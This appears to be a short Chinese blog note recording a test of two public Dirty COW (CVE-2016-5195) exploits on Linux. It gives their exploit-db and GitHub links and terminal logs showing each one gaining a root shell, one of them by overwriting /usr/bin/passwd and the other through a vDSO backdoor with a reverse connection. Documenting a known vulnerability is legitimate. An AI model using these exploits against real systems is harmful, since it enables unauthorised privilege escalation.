跳转至

CVE-2016-5195 Dirtycow

概述

最近出来的dirtycow,影响版本:Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复),用网上的EXP试了一下,记录一下过程

EXP

https://www.exploit-db.com/exploits/40616/

这个EXP是exploitdb上的,但是容易造成系统崩溃,成功后会返回一个root权限的shell

okami@ubuntu14:~$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 47032
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@ubuntu14:/home/okami# id
uid=0(root) gid=1000(okami) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(okami)
root@ubuntu14:/home/okami# whoami
root
root@ubuntu14:/home/okami#

https://github.com/scumjr/dirtycow-vdso

这个EXP不会出现系统崩溃,但是作者本人说不适用于所有linux版本,不过试验了一下,ubuntu14 16 centOS7都可以

okami@ubuntu14:~$ ./0xdeadbeef
[*] exploit: patch 1/2
[*] vdso successfully backdoored
[*] exploit: patch 2/2
[*] vdso successfully backdoored
[*] waiting for reverse connect shell...
[*] enjoy!
[*] restore: patch 2/2
[*] vdso successfully restored
[*] restore: patch 1/2
[*] vdso successfully restored
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.5 LTS
Release:    14.04
Codename:   trusty
注意这里有一步是waiting for reverse connect shell...,需要一点时间,成功后有root权限的shell